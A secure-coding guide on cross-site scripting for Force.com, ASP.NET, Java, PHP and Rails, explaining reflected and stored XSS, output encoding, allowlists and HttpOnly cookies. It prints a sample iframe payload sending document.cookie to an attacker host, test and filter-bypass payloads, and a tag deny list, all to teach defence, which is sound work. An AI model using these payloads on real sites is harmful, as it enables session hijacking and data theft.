
Cross-Site Scripting (XSS)


What is it?

Cross-site scripting is a vulnerability that occurs when an attacker can insert unauthorized JavaScript, VBScript, HTML, or other active content into a web page viewed by other users. A malicious script inserted into a page in this manner can hijack the user’s session, submit unauthorized transactions as the user, steal confidential information, or simply deface the page. Cross-site scripting is one of the most serious and most common attacks against web applications today.

XSS allows malicious users to control the content and code on your site — something only you should be able to do!

Sample vulnerability

Consider a web application with a search feature. The user sends their query as a GET parameter, and the application echoes that parameter back in the response:

Request: http://example.com/search?q=apples

Response: You searched for: apples

An XSS attack could take place if the user were visiting another site that included the following code:

<iframe
src="http://example.com/search?q=<script>document.location='http://cybervillains.com/?session='+document.cookie</script>">
</iframe>

The user’s browser will load the iframe by requesting http://example.com/search?q=<script>.... In response, example.com will echo back You searched for “<script>document.location='http://cybervillains.com/?session='+document.cookie</script>”. Unfortunately, the victim’s browser will interpret the script as code, not as text, and then execute the script in the context of the user’s session with example.com! It will be as if example.com developers had written their page that way.

In this case, the attack payload sends the value of document.cookie (that is, the user’s example.com cookie) to the attacker’s web site (cybervillains.com). However, there is essentially no limit to the payloads the attacker could have provided. Anything example.com developers can do with HTML and JavaScript, the attacker can also do.
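The flaw and its fix can be sketched in a few lines. The example below uses Python purely for illustration; the function names are hypothetical and do not belong to any platform API. The first function concatenates the query into the page as markup, while the second encodes it with the standard library's html.escape so that the browser displays it as text.

```python
import html


def render_search_unsafe(query: str) -> str:
    # Vulnerable: the raw query becomes part of the page markup.
    return "<p>You searched for: " + query + "</p>"


def render_search_safe(query: str) -> str:
    # Safer: HTML-encode the query so it is displayed, not executed.
    return "<p>You searched for: " + html.escape(query, quote=True) + "</p>"


payload = "<script>alert('XSS');</script>"
print(render_search_unsafe(payload))  # script tag survives intact
print(render_search_safe(payload))    # angle brackets become &lt; and &gt;
```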

Is my application vulnerable?

Cross-site scripting is one of the most common security vulnerabilities in web sites. Estimates of the percentage of web sites vulnerable to XSS range from 50% to as high as 80%. Most applications that do not have an explicit and uniformly applied set of input validators and output encoders designed to prevent XSS will have vulnerabilities.

How can I test my application?

You can perform a few simple tests to see if your application is vulnerable, but do not get overconfident if you do not discover a vulnerability immediately. Any XSS vulnerability anywhere on your web site can completely compromise the security of your users. Salesforce.com highly recommends using a web application security scanning tool to perform comprehensive testing for XSS across your entire web site.

Burp Suite Professional provides good capabilities, including XSS scanning, at a reasonable price. Information on using the Burp Scanner feature of the suite to test for XSS is available in the help file at http://portswigger.net/scanner/help.html.

The most basic test payload for XSS is a simple script that displays a browser pop-up if the site is vulnerable. Try submitting the string <script>alert('XSS');</script> for any form input that is later displayed by the application. If you don’t see the popup, look at the source for the page where the input is displayed. Are the angle-brackets encoded (&lt; and &gt;)? Is the script simply not in the correct context in the page to execute?
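When checking page source by hand becomes tedious, the same inspection can be roughed out in code. This is only a sketch, assuming you already have the returned page as a string; classify_reflection is a hypothetical helper, and a result of "not found" does not show the page is safe, since the payload may appear in another encoding or context.

```python
import html

PAYLOAD = "<script>alert('XSS');</script>"


def classify_reflection(page_source: str, payload: str = PAYLOAD) -> str:
    """Report how a test payload appears in a returned page."""
    if payload in page_source:
        # The payload came back verbatim: likely exploitable in tag content.
        return "reflected unencoded"
    encoded_variants = (
        html.escape(payload, quote=True),   # quotes encoded as well
        html.escape(payload, quote=False),  # only &, < and > encoded
    )
    if any(variant in page_source for variant in encoded_variants):
        return "reflected encoded"
    return "not found"
```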

Unfortunately, testing for XSS is not a simple proposition, even with an automated scanner. Some browsers may defend you from simple XSS attacks, leading you to believe the site is safe — but users with other browsers will be vulnerable. (And it is impossible for the browser to correctly stop all XSS attacks.) XSS can happen in many places and contexts. The inputs that create XSS in a tag content context will be different from those that work in an attribute, event handler, or script context. Different browsers interpret malformed HTML differently, and tricks of encoding and obfuscation may be used to bypass a variety of filters. The XSS Cheat Sheet hosted at ha.ckers.org demonstrates dozens of variants on XSS attacks.

XSS also comes in two variants: reflected XSS, demonstrated above, and persistent or stored XSS. Stored XSS happens when data enters an application in one location and the attack payload is stored and displayed by the system somewhere else. This might happen in a bulletin board application, or web-based news or email archives. Any application that stores user input and later displays it to other users can potentially be vulnerable to stored XSS attacks.

It should be apparent that testing even a small web application on the most popular browsers can require many thousands of test cases. XSS is an example of why an application cannot be tested into being secure — it must be engineered to be secure. Strong input filtering and output encoding, universally applied and verified through careful code review, is the best solution for preventing XSS.

For more information on this attack in general, see the following articles:


How do I protect my application?



Apex and Visualforce Applications

The Force.com platform provides several anti-XSS defenses. For example, we have implemented filters that screen out harmful characters in most output methods. For the developer using standard classes and output methods, the threats of XSS flaws have been largely mitigated.

However, the creative developer can still find ways to intentionally or accidentally bypass the default controls. The following sections explain where protection does and does not exist.

Existing Protection

All standard Visualforce components (tags of the form <apex:...>) have anti-XSS filters in place. For example, the following code would normally be vulnerable to an XSS attack because it takes user-supplied input and outputs it directly back to the user. But the <apex:outputText> tag is XSS-safe. All characters that appear to be HTML tags will be converted to their literal form. For example, the < character will be converted to &lt; so that a literal < will display on the user’s screen.

<apex:outputText>
{!$CurrentPage.parameters.userInput}
</apex:outputText>

Disabling escape on Visualforce tags

By default, nearly all Visualforce tags escape the XSS-vulnerable characters. It is possible to disable this behavior by setting the optional attribute escape="false". For example, the following code would be vulnerable to XSS attacks:

<apex:outputText escape="false"
value="{!$CurrentPage.parameters.userInput}" />

Programming Constructs That Are Not Protected From XSS

The following mechanisms do not have built-in XSS protections, so take extra care when using these tags and objects. These items were intended to let the developer customize the page by inserting script commands, and it would not make sense to include anti-XSS filters on commands that are intentionally added to a page.

S-Controls and Custom JavaScript

If you write your own JavaScript or S-controls, the Force.com platform has no way to protect you. For example, the following code is vulnerable to XSS if used in JavaScript:

<script>
var foo = location.search;
document.write(foo);
</script>

<apex:includeScript>

The <apex:includeScript> Visualforce component allows you to include a custom script on the page. The value attribute of the tag is the URL of the JavaScript file to include, so be very careful to ensure that it is sanitized and does not contain user-supplied data. The following snippet is extremely vulnerable because it uses user-supplied input as that URL. If an attacker can supply arbitrary data to this parameter, they can potentially direct the victim to include any JavaScript file from any other web site.

<apex:includeScript value="{!$CurrentPage.parameters.userInput}" />

S-Control Template and Formula Tags

S-Controls give the developer direct access to the HTML page itself and include an array of tags that can be used to insert data into the pages. As described above, S-Controls do not use any built-in XSS protections. When using the template and formula tags, all output is unfiltered and must be validated by the developer.

The general syntax of these tags is: {!FUNCTION()} or {!$OBJECT.ATTRIBUTE}.

For example, if a developer wanted to include a user’s session ID in a link, they could create the link using the following syntax:

<a
href="http://example.com/integration/?sid={!$Api.Session_ID}&server={!$Api.Partner_Server_URL_130}">Go
to portal</a>

This would render output similar to:

<a
href="http://partner.domain.com/integration/?sid=4f0900D30000000Jsbi%21AQoAQNYaPnVyd_6hNdIxXhzQTMaaSlYiOfRzpM18huTGN3jC0O1FIkbuQRwPc9OQJeMRm4h2UYXRnmZ5wZufIrvd9DtC_ilA&server=https://na1.salesforce.com/services/Soap/u/13.0/4f0900D30000000Jsbi">Go
to portal</a>

Formula expressions can be function calls or include information about platform objects, a user’s environment, system environment, and the request environment. An important feature of these expressions is that data is not escaped during rendering. Since expressions are rendered on the server, it is not possible to escape rendered data on the client using JavaScript or other client-side technology. This can lead to potentially dangerous situations if the formula expression references non-system data (i.e. potentially hostile or editable) and the expression itself is not wrapped in a function to escape the output during rendering. A common vulnerability is created by the use of the {!$Request.*} expression to access request parameters:

<html><head><title>{!$Request.title}</title></head><body>Hello
world!</body></html>

This will cause the server to pull the title parameter from the request and embed it into the page. So, the request

http://example.com/demo/hello.html?title=Hola

would produce the rendered output

<html><head><title>Hola</title></head><body>Hello
world!</body></html>

Unfortunately, the unescaped {!$Request.title} tag also results in a cross-site scripting vulnerability. For example, the request

http://example.com/demo/hello.html?title=Adios%3C%2Ftitle%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E

results in the output

<html><head><title>Adios</title><script>alert('xss')</script></title></head><body>Hello
world!</body></html>

The standard mechanism to do server-side escaping is through the use of the JSENCODE, HTMLENCODE, JSINHTMLENCODE, and URLENCODE functions or the traditional SUBSTITUTE formula tag. Given the placement of the {!$Request.*} expression in the example, the above attack could be prevented by wrapping the expression in an HTMLENCODE call:

<html>
<head>
<title>
{!HTMLENCODE($Request.title)}
</title>
</head>
<body>Hello world!</body>
</html>

Depending on the placement of the tag and usage of the data, both the characters needing escaping as well as their escaped counterparts may vary. For instance, this statement:

 <script>var ret = "{!$Request.retURL}";</script>

would require that the double quote character be escaped with its URL encoded equivalent of %22 instead of the HTML escaped &quot;, since it’s likely going to be used in a link. Otherwise, the request

http://example.com/demo/redirect.html?retURL=foo%22%3Balert('xss')%3B%2F%2F

would result in

<script>var ret = "foo";alert('xss');//";</script>

Additionally, the ret variable may need additional client-side escaping later in the page if it is used in a way which may cause included HTML control characters to be interpreted. Examples of correct usage are below:

<script>
     // Encode for URL
     var ret = "{!URLENCODE($Request.retURL)}";
     window.location.href = ret;
</script>


<script>
     // Encode for JS variable that is later used in HTML operation
     var title = "{!JSINHTMLENCODE($Request.title)}";
     document.getElementById('titleHeader').innerHTML = title;
</script>


<script>
     // Standard JSENCODE to embed in JS variable not later used in HTML
     var pageNum = "{!JSENCODE($Request.PageNumber)}";
</script>


Formula tags can also be used to include platform object data. Although the data is taken directly from the user’s org, it must still be escaped before use to prevent users from executing code in the context of other users (potentially those with higher privilege levels). While these types of attacks would need to be performed by users within the same organization, they would undermine the organization’s user roles and reduce the integrity of auditing records. Additionally, many organizations contain data which has been imported from external sources and which may not have been screened for malicious content.


General Guidance

Protecting your application from XSS risks requires a two-layered strategy: input filtering and output filtering and encoding.

The goal of input filtering is to constrain inputs to their expected format and to render any dangerous input harmless by removing dangerous characters. It is always safer to constrain inputs to known-good values than to try to filter dangerous characters. A filter that removes the characters <, >, and " in a user nickname field may prevent XSS attacks when the content is inserted into a page in the context of an HTML element, but what if the input is used in the context of a <script> block, such as the script used to calculate site analytics? In that case, an exploit may not need to use those characters, and filtering on characters like parentheses, periods and semicolons may be necessary. A simple regular expression that only allows alphabetic characters would prevent both attacks and greatly reduce the likelihood of missing characters that are dangerous in other contexts.
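A known-good check of this kind might look like the following sketch. It is written in Python for illustration, and the rule itself (1 to 20 ASCII letters) is an assumption chosen for the nickname example, not a recommendation for every field.

```python
import re

# Hypothetical rule: a nickname is 1 to 20 ASCII letters and nothing else.
NICKNAME_RE = re.compile(r"[A-Za-z]{1,20}")


def is_valid_nickname(value: str) -> bool:
    # fullmatch requires the entire string to match, so a trailing
    # newline or an appended payload causes rejection.
    return NICKNAME_RE.fullmatch(value) is not None
```

Rejecting input that fails the check, rather than trying to repair it, keeps the rule easy to reason about.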

Remember that all user input must be filtered. GET and POST form parameters are not the only place that malicious data may originate. No part of an HTTP request can be trusted. XSS payloads might originate in a user’s cookie or other headers like Referer. Treat all input as suspicious.

Output encoding is the second, and arguably more important, defense. Output encoding refers to rewriting data such that it cannot “break out” of the structural context into which it is inserted. For most scenarios, HTML encoding will be the most appropriate; that is, encoding the characters &, <, > and " into their HTML entity equivalents: &amp;, &lt;, &gt;, and &quot;. Nearly all web frameworks will have utility classes or methods for performing this encoding, and using a page templating or a DOM-aware framework that automatically encodes all output, by default, is one of the best defenses against XSS.

Note that &apos; is the XML entity for the apostrophe and is not a valid entity in HTML 4 (it was only added in HTML5)! In an HTML context it is safer to use the numeric character reference &#39;.
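As an illustration of HTML output encoding, the sketch below uses Python's standard html.escape function; encode_for_html is a hypothetical wrapper name. With quote=True the function also encodes both quote characters, and it emits a numeric reference for the apostrophe rather than a named entity.

```python
import html


def encode_for_html(value: str) -> str:
    # quote=True encodes " and ' in addition to &, < and >, so the
    # result can also be placed inside a quoted attribute value.
    return html.escape(value, quote=True)


print(encode_for_html("<a href=\"x\">Tom & Jerry's</a>"))
# &lt;a href=&quot;x&quot;&gt;Tom &amp; Jerry&#x27;s&lt;/a&gt;
```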

Inserting text into a JavaScript context is more difficult and should only be done inside of a variable context that will be used strictly as data. JavaScript uses a backslash encoding similar to C and C++. Be cautious when inserting data into a script variable: escape single and double quotes (and the backslash character itself) to prevent injection. Prefer the Unicode encoding format, \udddd (4 hex digits: dddd), to prevent any browser parsing problems.
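One conservative way to apply the \udddd format is to leave only ASCII letters and digits untouched and escape everything else. The Python sketch below takes that approach; js_string_escape is a hypothetical helper, and its output is only meant to be placed between the quotes of a JavaScript string literal, never directly into code.

```python
def js_string_escape(value: str) -> str:
    """Escape a value for use inside a quoted JavaScript string literal."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)  # ASCII letters and digits pass through
            continue
        code = ord(ch)
        if code > 0xFFFF:
            # Characters outside the BMP need a UTF-16 surrogate pair.
            code -= 0x10000
            out.append("\\u%04x\\u%04x" % (0xD800 + (code >> 10),
                                             0xDC00 + (code & 0x3FF)))
        else:
            out.append("\\u%04x" % code)
    return "".join(out)


print('var nick = "' + js_string_escape('";alert(1);//') + '";')
```

Because quotes, backslashes, and angle brackets are all escaped, the value can neither close the string literal nor end the enclosing script element.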

Cascading style sheets (CSS) are also a potential location for XSS attacks and so should be encoded carefully or user-specified style attributes disallowed.

Output filtering is similar to input filtering, and should be applied in contexts when output encoding may not be adequate. User data inserted directly into a <script> context, for example, cannot be encoded in a way which makes it safe. The only solution in such a situation is to constrain the data to ensure they do not contain any dangerous characters such as parentheses, periods, and single or double quotes.

Why are output encoding and filtering important if we have already performed input filtering? Many applications do not exclusively display input taken from web forms. Dangerous data might have been imported from a database or spreadsheet, or might originate from an email message or some other source where input filtering has not been applied. In some cases, data that meet the requirements of an input filter may nevertheless be unsafe when used in a particular output context.

If your application allows users to include HTML tags by design, you must exercise great caution in what tags are allowed. The following tags may allow injection of script code and should not be allowed:

  • <applet>
  • <body>
  • <embed>
  • <frame>
  • <script>
  • <frameset>
  • <html>
  • <iframe>
  • <img>
  • <style>
  • <layer>
  • <link>
  • <ilayer>
  • <meta>
  • <object>

Be aware that the above list cannot be exhaustive. Similarly, there is no complete list of JavaScript event handler names (although see this page on Quirksmode), so there can be no perfect list of bad HTML element attribute names.

Instead, it makes more sense to create a well-defined known-good subset of HTML elements and attributes. Using your programming language’s HTML or XML parsing library, create an HTML input handling routine that throws away all HTML elements and attributes not on the known-good list. This way, you can still allow a wide range of text formatting options without taking on unnecessary XSS risk. Creating such an input validator is usually around 100 lines of code in a language like Python or PHP; it might be more in Java but is still very tractable.
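A minimal sketch of such a routine, using Python's standard html.parser module, is shown below. The allowed elements, attributes, and URL schemes are assumptions chosen for illustration, and a production filter would need more thorough testing than this example has had.

```python
from html import escape
from html.parser import HTMLParser

# Hypothetical known-good list: element name -> allowed attribute names.
ALLOWED = {"b": set(), "i": set(), "em": set(), "strong": set(),
           "p": set(), "br": set(), "a": {"href"}}
SAFE_SCHEMES = ("http://", "https://", "mailto:")


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # drop unknown elements entirely
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue  # drop unknown attributes, e.g. event handlers
            if name == "href" and not value.strip().lower().startswith(SAFE_SCHEMES):
                continue  # drop javascript:, data: and other schemes
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag != "br":
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        # Text is always re-encoded, so stray < or > cannot form new tags.
        self.out.append(escape(data, quote=False))


def sanitize(markup: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)
```

Because the output is rebuilt from parsed tokens rather than edited in place, broken or nested tags in the input cannot recombine into a live element.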

Output filtering and encoding for URLs including user data requires some special considerations. If you return user-controlled data as part of a URL, URL encode that data. (URL encoding translates space to ‘+’ and uses %xx hex encoding for unsafe or non-ASCII-printable characters.) If you allow users to specify an entire URL to link to arbitrary content, ensure that the scheme of the URL is constrained to valid types (e.g. http:, https:, mailto: and possibly ftp:). Allowing users to specify other URL schemes may lead to XSS, such as with the javascript: and data: schemes.
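Both URL rules can be sketched with Python's standard urllib.parse module. The function names and the exact set of allowed schemes below are assumptions for illustration; note that this check also rejects relative URLs, which may or may not suit your application.

```python
from urllib.parse import quote_plus, urlsplit

# Hypothetical allowlist of schemes users may link to.
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def build_search_link(term: str) -> str:
    # quote_plus turns spaces into '+' and other unsafe characters into %xx.
    return "http://example.com/search?q=" + quote_plus(term)


def is_allowed_link(url: str) -> bool:
    # Only absolute URLs with a known-good scheme are accepted.
    return urlsplit(url.strip()).scheme.lower() in ALLOWED_SCHEMES


print(build_search_link("a b<c>"))  # http://example.com/search?q=a+b%3Cc%3E
```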

When possible, set the HttpOnly attribute on your cookies. This flag tells the browser to reveal the cookie only over HTTP or HTTPS connections, but to have document.cookie evaluate to a blank string when JavaScript code tries to read it. (Some browsers do still let JavaScript code overwrite or append to document.cookie, however.) If your application does require the ability for JavaScript to read the cookie, then you won’t be able to set HttpOnly. Otherwise, you might as well set this flag.

Note that HttpOnly is not a defense against XSS; it is only a way to briefly slow down attackers exploiting XSS with the simplest possible attack payloads. It is not a bug or vulnerability for the HttpOnly flag to be absent.
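How the flag is set depends on your framework. As one illustration, the Python standard library's http.cookies module can produce a Set-Cookie value with the attribute; the cookie name session and the helper name are hypothetical.

```python
from http.cookies import SimpleCookie


def session_cookie_header(session_id: str) -> str:
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True  # hide the cookie from document.cookie
    cookie["session"]["path"] = "/"
    # OutputString returns the value portion of a Set-Cookie header.
    return cookie["session"].OutputString()


print("Set-Cookie: " + session_cookie_header("abc123"))
```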

Stored XSS Resulting from Arbitrary User Uploaded Content

Applications such as content management or email marketing systems may need to allow legitimate users to create or upload custom HTML, JavaScript, or files. This feature could be misused to launch XSS attacks. For instance, a lower privileged user could attack an administrator by creating a malicious HTML file that steals session cookies. The recommended protection is to serve such arbitrary content from a separate domain outside of the session cookie's scope.

Let’s say cookies are scoped to https://app.site.com. Even if customers can upload arbitrary content, you can always serve the content from an alternate domain that is outside of the scoping of any trusted cookies (session cookies and other sensitive information). As an example, pages on https://app.site.com would reference customer-uploaded HTML templates as IFRAMES using a link to https://content.site.com/cust1/templates?templId=13&auth=someRandomAuthenticationToken

The authentication token would substitute for the session cookie since sessions scoped to app.site.com would not be sent to content.site.com. If the data being stored is sensitive, a one time use or short lived token should be used. This is the method that salesforce.com uses for our content product.
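A one-time, short-lived token scheme might be sketched as follows. This is an in-memory Python illustration under stated assumptions, not a description of how any particular product implements it: the class name, the 60-second lifetime, and the resource identifier format are all hypothetical, and a real deployment would need storage shared between the application and content servers.

```python
import secrets
import time


class OneTimeTokenStore:
    def __init__(self, ttl_seconds: float = 60.0):
        self.ttl = ttl_seconds
        self._tokens = {}  # token -> (resource_id, expiry time)

    def issue(self, resource_id: str) -> str:
        # Unguessable random token bound to one resource.
        token = secrets.token_urlsafe(32)
        self._tokens[token] = (resource_id, time.monotonic() + self.ttl)
        return token

    def redeem(self, token: str, resource_id: str) -> bool:
        # pop() removes the token, so it can be used at most once.
        entry = self._tokens.pop(token, None)
        if entry is None:
            return False
        stored_resource, expiry = entry
        return stored_resource == resource_id and time.monotonic() <= expiry
```

The application domain would call issue when building the iframe link, and the content domain would call redeem before serving the file.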

HTTP Response Splitting

HTTP response splitting is a vulnerability closely related to XSS, and for which the same defensive strategies apply. Response splitting occurs when user data is inserted into an HTTP header returned to the client. Instead of inserting malicious script, the attack is to insert additional newline characters. Because headers and the response body are delimited by newlines in HTTP, this allows the attacker to insert their own headers and even construct their own page body (which might have an XSS payload inside). To prevent HTTP response splitting, filter ‘\n’ and ‘\r’ from any output used in an HTTP header.
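The filter itself is short. The Python sketch below uses a hypothetical helper name and simply removes carriage returns and line feeds; rejecting the request outright when they appear is an equally reasonable choice.

```python
def safe_header_value(value: str) -> str:
    # Remove CR and LF so user data cannot terminate the header line
    # and start a new header or the response body.
    return value.replace("\r", "").replace("\n", "")


print(safe_header_value("en\r\nSet-Cookie: injected=1"))
# enSet-Cookie: injected=1
```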


ASP.NET

ASP.NET provides several built-in mechanisms to help prevent XSS, and Microsoft supplies several free tools for identifying and preventing XSS in sites built with .NET technology.

An excellent general discussion of preventing XSS in ASP.NET 1.1 and 2.0 can be found at the Microsoft Patterns & Practices site:

By default, ASP.NET enables request validation on all pages to reject input containing unencoded HTML. (For more details see http://www.asp.net/learn/whitepapers/request-validation/.) Verify in your Machine.config and Web.config that you have not disabled request validation. Identify and correct any pages that may have disabled it individually by searching for the ValidateRequest attribute in the page declaration tag. If this attribute is not present, it defaults to true.

Input Validation

For server controls in ASP.NET, it is simple to add server-side input validation using <asp:RegularExpressionValidator>.

If you are not using server controls, you can use the Regex class in the System.Text.RegularExpressions namespace or use other supporting classes for validation.

For example regular expressions and tips on other validation routines for numbers, dates, and URL strings, see Microsoft Patterns & Practices: “How To: Protect from Injection Attacks in ASP.NET”.

Output Filtering & Encoding

The System.Web.HttpUtility class provides convenient methods, HtmlEncode and UrlEncode, for escaping output to pages. These methods are safe, but follow a “blacklist” approach that encodes only a few characters known to be dangerous. Microsoft also makes available the AntiXSS Library that follows a more restrictive approach, encoding all characters not in an extensive, internationalized whitelist. You can get more information and download AntiXSS here:

Tools and Testing

Microsoft provides a free static analysis tool, CAT.NET. CAT.NET is a snap-in to Visual Studio that helps identify XSS as well as several other classes of security flaw. Version 1 of the tool is available as a Community Technical Preview from the Microsoft download site:


Java

J2EE web applications have perhaps the greatest diversity of frameworks available for handling user input and creating pages. Several strong, all-purpose libraries are available, but it is important to understand what your particular platform provides.

Input Filtering

Take advantage of built-in framework tools to validate input as it is being used to generate business or model objects. In Struts, input validation rules can be defined in XML using the Validator Plugin in your struts-config.xml:

<plug-in className="org.apache.struts.validator.ValidatorPlugIn">
    <set-property property="pathnames" value="/WEB-INF/validator-rules.xml"/>
</plug-in>

Or you can build programmatic validation directly into your form beans with regular expressions.

Learn more about Java regular expressions here:

The Spring Framework also provides utilities for building automatic validation into data binding. You can implement the org.springframework.validation.Validator interface with the help of Spring’s ValidationUtils class to protect your business objects. Get more information here:

A more generic approach, applicable to any kind of Java object, is presented by the OVal object validation framework. OVal allows constraints on objects to be declared with annotations, through POJOs or in XML, and expressing custom constraints as Java classes or in a variety of scripting languages. The system is quite powerful, implements Programming by Contract features using AspectJ, and provides some built-in support for frameworks like Spring. Learn more about OVal at:


Output Filtering and Encoding

JSTL tags such as <c:out> have the escapeXml attribute set to true by default. This default behavior ensures that HTML special characters are entity-encoded and prevents many XSS attacks. If any tags in your application set escapeXml="false" (such as for outputting the Japanese yen symbol) you need to apply some other escaping strategy. For JSF, the tag attribute is escape, and is also set to true by default for <h:outputText> and <h:outputFormat>.

Other page generation systems do not always escape output by default. Freemarker is one example. All application data included in a Freemarker template should be surrounded with an <#escape> directive to do output encoding (e.g. <#escape x as x?html>) or by manually adding ?html (or ?js_string for JavaScript contexts) to each expression (e.g. ${username?html}).

Custom JSP tags or direct inclusion of user data variables with JSP expressions (e.g. <%= request.getHeader("Referer") %>) or scriptlets (e.g. <% out.println(request.getHeader("Referer")); %>) should be avoided.

If you are using a custom page-generation system, one that does not provide output escaping mechanisms, or building directly with scriptlets, there are several output encoding libraries available. The OWASP Enterprise Security API for Java is a mature project that offers a variety of security services to J2EE applications. The org.owasp.esapi.codecs package provides classes for encoding output strings safely for HTML, JavaScript and several other contexts. Get it here:

Other libraries to consider include the Apache Commons Lang StringEscapeUtils class or the multi-platform Reform library from the OWASP Encoding Project.


PHP

Input Filtering

As of PHP 5.2.0, data filtering is a part of the PHP Core. The package documentation is available at:

Two types of filters can be declared: sanitization filters that strip or encode certain characters, and validation filters that can apply business logic rules to inputs. The Zend Developer Zone has a good tutorial on how to use the Filter extension, including the legacy package for earlier versions of PHP and demonstrating an example of a more complex validation using a callback:


Output Encoding

PHP provides two built-in string functions for encoding HTML output. htmlspecialchars encodes only &, ", <, and > (plus ' when the ENT_QUOTES flag is set, which is the default from PHP 8.1 onward), while htmlentities encodes all characters that have defined HTML entities.

For bulletin-board like functionality where HTML content is intended to be included in output, the strip_tags function is also available to return a string with all HTML and PHP tags removed, but because this function is implemented with a regex that does not validate that incoming strings are well-formed HTML, partial or broken tags may be able to bypass the system. For example, the string <<b>script>alert('xss');<</b>/script> might have the <b> and </b> tags removed, leaving the vulnerable string <script>alert('xss');</script>. If you are going to rely on this function, input must be sent to an HTML validating and tidying program first. (Note that in PHP 5.2.6, strip_tags does appear to work, reducing the aforementioned attack string to alert('xss'). Does it work in your version?)
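The failure mode described above is easy to reproduce with a deliberately naive filter. The Python sketch below is not how strip_tags is implemented; naive_strip_bold is a hypothetical stand-in for any filter that removes a fixed set of tags in a single pass without parsing the markup.

```python
import re


def naive_strip_bold(markup: str) -> str:
    # Single-pass removal of <b> and </b>; no check that the input
    # is well-formed HTML.
    return re.sub(r"</?b>", "", markup)


attack = "<<b>script>alert('xss');<</b>/script>"
print(naive_strip_bold(attack))  # <script>alert('xss');</script>
```

Removing the inner tags joins the surrounding fragments into a complete script element, which is why the text recommends parsing or tidying the input first.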

For a more comprehensive approach that combines encoding with an extensive whitelist, the multi-platform Reform library from the OWASP Encoding Project contains PHP implementations of strong output filters for several contexts.


Ruby on Rails

Input Filtering

Older versions of Ruby on Rails used a vulnerable blacklist approach built on trying to recognize and remove tags. This suffered from vulnerabilities if applied to strings that had broken or partial HTML. For example, the string <<b>script>alert('xss');<</b>/script> would have the <b> and </b> tags removed, leaving the vulnerable string <script>alert('xss');</script>. For this reason, avoid the strip_tags and strip_links methods in favor of the updated Rails 2 method sanitize.

See the Ruby on Rails Security guide for more information:


Output Encoding

Strings written by <%= %> in rhtml templates are not escaped by default. The html_escape method (or its shorthand, h) can be used to entity encode HTML characters, but you must be careful to do this in every location where user input is used.

For a more comprehensive approach that combines encoding with an extensive whitelist, the multi-platform Reform library from the OWASP Encoding Project contains Ruby implementations of strong output filters for several contexts.